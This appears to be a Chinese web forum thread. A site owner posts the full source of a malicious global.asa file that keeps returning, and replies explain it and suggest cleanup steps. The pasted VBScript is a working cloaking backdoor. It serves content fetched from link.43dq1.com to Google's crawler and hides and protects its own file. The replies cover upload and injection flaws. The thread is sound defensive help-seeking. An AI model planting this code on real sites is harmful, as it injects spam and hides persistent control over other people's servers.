你们懂吗?这是什么病毒程序?我的网站老出现,删了又有。后门藏在哪里
我的网页老被加载一些莫名代码。网站中查到有个陌生的程序(程序名global.asa),删了下次打开还出现。是不是我网站中程序有后门,如果有它们一般会放在哪里?
代码如下:(能帮忙解释下,这个程序什么作用)
<script language="vbscript" runat="server">
sub Application_OnStart
end sub
sub Application_OnEnd
end sub
sub Session_OnStart
dim name
name=request.servervariables("Path_Translated")
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))
if instr(name,";")>0 then
f.Attributes=1+2+4
response.end()
end if
if instr(server.MapPath("."),".asp")>0 or instr(server.MapPath("."),".asa")>0 then
f.Attributes=1+2+4
response.end()
end if
Dim v
Dim t
ReDim A(Request.Form.Count)
ReDim B(Request.Form.Count)
v=Request.Form
t=Request.Form.Count
if t>0 then
For i=0 To t-1
b(i)=Split(Split(v,"&")(i),"=")(1)
if instr(LCase(b(i)),"global.asa")>0 then
f.Attributes=1+2+4
response.end()
end if
Next
end if
Dim ScriptAddress, M_ItemUrl, M_item
ScriptAddress = CStr(Request.ServerVariables("SCRIPT_NAME"))
If (Request.QueryString <> "") Then
GetUrl =Request.ServerVariables("Server_Name")&ScriptAddress &"?"&Request.QueryString
else
GetUrl= Request.ServerVariables("Server_Name")&ScriptAddress
end if
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
httpuser=LCase(request.servervariables("http_user_agent"))
strURL=Request.ServerVariables("HTTP_REFERER")
Dim I
If InStr(strURL, "%") = 0 Then
URLDecode = strURL
end if
For I = 1 To Len(strURL)
If Mid(strURL, I, 1) = "%" Then
If eval("&H" & Mid(strURL, I + 1, 2)) > 127 Then
URLDecode = URLDecode & Chr(eval("&H" & Mid(strURL, I + 1, 2) & Mid(strURL, I + 4, 2)))
I = I + 5
Else
URLDecode = URLDecode & Chr(eval("&H" & Mid(strURL, I + 1, 2)))
I = I + 2
End If
Else
URLDecode = URLDecode & Mid(strURL, I, 1)
End If
Next
if instr(httpuser,"google")>0 then
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET","http://link.43dq1.com/try7723.asp?weburl="&GetUrl&"&dd="&cstr(int(rnd()*10000)+1)&"&bot="&httpuser,False
ObjXMLHTTP.setRequestHeader "User-Agent","http://link.43dq1.com/"
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
if instr(lcase(gethtml),"nodomain")>0 then
else
response.write gethtml
end if
end if
f.Attributes=1+2+4
end sub
</script>
------解决方案--------------------
小黑一般通过工具来扫站点的注入点,发现注入点之后,破解后台密码,如果后台有什么上传漏洞,站点就遭了,或者楼主站点所在服务器被黑了,楼主的站点也跟着遭殃。
这个asa是远程读取数据,并在访问网页显示出来,一般都是写广告黑链之类的。
[解决办法]
你把整站的文件都下载下来分析一下吧
在全部文件里搜索 exec (包括图片文件) 和 eval,你会有惊喜的
然后,你需要把你的上传程序啥的从新调整下,做下安全处理
[解决办法]
你上传程序有问题
以前也碰到过这样的问题
我以前的漏洞是fckeditor和iis中的毛病
[解决办法]
被人注入了。
把整站下载下来。文件查一下。有没有可疑文件,特别是调用了Scripting.FileSystemObject这个组件的。
这个组件名字,可能他不会写在一起。整体搜索的话,不一定能搜索到。
还有。你的上传。有没有限制上传ASA文件?检查一下上传代码和上传文件夹。
如果可能的话,可以限制一下Global.asa 把它变为只读。免得那些人老拿这个做文章。
